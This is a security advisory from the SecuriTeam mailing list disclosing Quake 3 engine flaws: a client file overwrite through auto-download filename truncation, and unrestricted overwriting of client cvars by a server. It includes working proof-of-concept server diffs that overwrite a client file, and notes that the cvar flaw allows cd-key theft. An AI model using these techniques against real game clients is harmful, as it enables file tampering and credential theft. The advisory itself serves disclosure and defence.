The following security advisory is sent to the securiteam mailing list, and can
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Quake 3 Engine Multiple Vulnerabilities (Files Overwriting, Cvars
Overwriting)
------------------------------------------------------------------------
SUMMARY
The Quake 3 engine is "a well known game engine developed by ID Software".
Improper handling of user input allows attackers to overwrite needed data.
DETAILS
Vulnerable Systems:
* Quake 3 version 1.32c and prior
* Icculus.org Quake 3 revision 803 and prior
Files overwriting through Automatic Downloading:
The Quake 3 engine supports an option called "Automatic Downloading" which
allows the clients to automatically download the PK3 files (maps and mods)
available on the server but not locally.
This option is disabled by default for security reasons and Icculus Quake
3 is actually the only version of the engine which uses an anti directory
traversal check for avoiding the overwriting of system files.
This check can be bypassed through the bug cvars overwriting in this
advisory, so an attacker can overwrite any file in any disk of the
computer in which Quake 3 is running.
The following is a short description of the mechanism used by the "Auto
Downloading" option for downloading a PK3 file from a server:
* server sends the list of the checksums and names of the PK3 files
currently in use: sv_referencedPaks and sv_referencedPakNames these
informations (cvars) are contained in the systemInfo string
* The client compares the server's filenames and checksums with its own
* Every unavailable or different PK3 file is added to the neededpaks
buffer using the Q_strcat function (for avoiding possible buffer-overflow
vulnerabilities) with the limitation of 64 chars for each filename and the
adding of the .pk3 extension to each remote and local filename following
the format: @remotename@localname
* the client starts to automatically download each file (remotename),
saves it (localname) with the temporary .tmp extension and then renames it
with the name available in the localname field seen before
The usage of Q_strcat allows a malicious server to avoid the adding of the
pk3 extension (needed for security reasons) to the last filename of the
neededpaks buffer if the length of 1023 bytes is reached:
@remotename.pk3@localname.pk3...@remotename.pk3@localname[.pk3]
So the latest .pk3 extension of the local filename is not added if the
total length of the string reaches this limit, that's all the bug.
The client truncates the filenames at maximum 64 bytes before adding the
pk3 extension so we need to specify some useless files before our target
file for reaching the 1023 bytes limit.
The result is that a malicious server can overwrite all the files
contained in the folder pointed by the fs_homepath cvar of the client or
can create new files with any possible extension.
By default fs_homepath (where are stored the configuration files, the
Punkbuster files and others) is the ~/.q3a folder in Linux and the Quake 3
folder in Windows BUT, as hinted before, we can modify it through the B
vulnerability which follows.
cvars overwriting with possible information gathering:
The same string sent by the server containing the sv_referencedPaks and
sv_referencedPakNames cvars (variables) described in the previous bug
contains also many other cvars which are automatically set on the client
when the player joins the server (this is a fixed feature of the engine,
cannot be disabled and is not related to the Automatic Downloading
feature).
Code Snips:
Everything is well explained in code/client/cl_parse.c:
void CL_SystemInfoChanged( void ) {
...
s = systemInfo;
while ( s ) {
Info_NextPair( &s, key, value );
if ( !key[0] ) {
break;
}
// ehw!
if ( !Q_stricmp( key, "fs_game" ) ) {
gameSet = qtrue;
}
Cvar_Set( key, value );
}
...
In short is possible to overwrite or create any cvar of the client.
The ways for exploiting this bug are a lot:
* cd-key stealing through a sv_master1 cvar which points to the
attacker's host, the Quake 3 engine sends plain-text cd-keys in the
authorization queries so they are ready to be reused
* enabling of the Automatic Downloading feature through cl_allowdownload
set to 1
* overwriting any file in the system through the fs_homepath cvar and the
bug A described in this advisory
Proof of Concept:
The proof-of-concept consists in a small modification of the server.
The following are the two diff files for overwriting the client's file
baseq3/games.log in the c: folder, remember to create a file called
bad.txt in the server's Quake 3 folder containing the data to put in the
target client's file.
Keep in mind that this PoC is really very basic and not so optimized, it's
just a quick and simple demonstration of the effects of both the bugs at
the same time.
Remember also to enable the "Automatic Downloading" option on the client
for testing the bug A.
Enter in the Quake 3 source folder (like /tmp/quake3, the patches have
been created on the revision 810 of Icculus Quake 3) and type:
patch -p0 < sv_client.diff
patch -p0 < sv_init.diff
sv_client.diff:
--- code/server/sv_client.c
+++ code/server/sv_client.c
@@ -714,6 +714,11 @@
// Find out if we are done. A zero-length block indicates
EOF
if (cl->downloadBlockSize[cl->downloadClientBlock %
MAX_DOWNLOAD_WINDOW] == 0) {
Com_Printf( "clientDownload: %d : file \"%s\"
completed\n", cl - svs.clients, cl->downloadName );
+ if(memcmp(cl->downloadName, "none_", 5)) {
+ cl->state = CS_ZOMBIE;
+ SV_DropClient( cl, "disconnected" );
+ Com_Printf( "Malicious file sent to the
client, connection closed\n" );
+ }
SV_CloseDownload( cl );
return;
}
@@ -765,6 +770,13 @@
return; // Nothing being downloaded
if (!cl->download) {
+ if(!memcmp(cl->downloadName, "none_", 5)) {
+ cl->downloadSize = 0;
+ } else {
+ cl->downloadSize = FS_SV_FOpenFileRead( "bad.txt",
&cl->download);
+ }
+ unreferenced = 0;
+ goto letsgo;
// Chop off filename extension.
Com_sprintf(pakbuf, sizeof(pakbuf), "%s",
cl->downloadName);
pakptr = Q_strrchr(pakbuf, '.');
@@ -845,6 +857,7 @@
return;
}
+letsgo:
Com_Printf( "clientDownload: %d : beginning \"%s\"\n", cl
- svs.clients, cl->downloadName );
// Init
sv_init.diff:
--- code/server/sv_init.c
+++ code/server/sv_init.c
@@ -533,9 +533,21 @@
// the server sends these to the clients so they can figure
// out which pk3s should be auto-downloaded
p = FS_ReferencedPakChecksums();
+ int timeint = time(NULL);
+ sprintf(p,
+ "%i %i %i %i %i %i %i %i",
+ timeint + 1, timeint + 2, timeint + 3, timeint + 4,
+ timeint + 5, timeint + 6, timeint + 7, timeint + 8);
Cvar_Set( "sv_referencedPaks", p );
p = FS_ReferencedPakNames();
+ sprintf(p,
+ "none_%059i none_%059i none_%059i none_%059i "
+ "none_%059i none_%059i none_%059i "
+ "baseq3/games.log___________________",
+ timeint + 1, timeint + 2, timeint + 3, timeint + 4,
+ timeint + 5, timeint + 6, timeint + 7);
Cvar_Set( "sv_referencedPakNames", p );
+ Cvar_Set( "fs_homepath", "c:" ); // or /tmp/ or .. (NO
backslash)
// save systeminfo and serverinfo strings
Q_strncpyz( systemInfo, Cvar_InfoString_Big( CVAR_SYSTEMINFO ),
sizeof( systemInfo ) );
@@ -596,6 +608,7 @@
Cvar_Get ("sv_pakNames", "", CVAR_SYSTEMINFO | CVAR_ROM );
Cvar_Get ("sv_referencedPaks", "", CVAR_SYSTEMINFO | CVAR_ROM );
Cvar_Get ("sv_referencedPakNames", "", CVAR_SYSTEMINFO | CVAR_ROM
);
+ Cvar_Get ("fs_homepath", "", CVAR_SYSTEMINFO | CVAR_ROM );
// server vars
sv_rconPassword = Cvar_Get ("rconPassword", "", CVAR_TEMP );
Vendor Status:
Bug A has been fixed in Icculus Quake 3 version 804 but keep in mind that
the "Automatic Downloading" feature should be NEVER enabled.
Actually no fix is available for bug B.
ADDITIONAL INFORMATION
The information has been provided by <mailto:aluigi@autistici.org> Luigi
Auriemma.
The original article can be found at:
<http://aluigi.altervista.org/adv/q3cfilevar-adv.txt>
http://aluigi.altervista.org/adv/q3cfilevar-adv.txt
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to:
list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to:
list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any
kind.
In no event shall we be liable for any damages whatsoever including direct,
indirect, incidental, consequential, loss of business profits or special
damages.
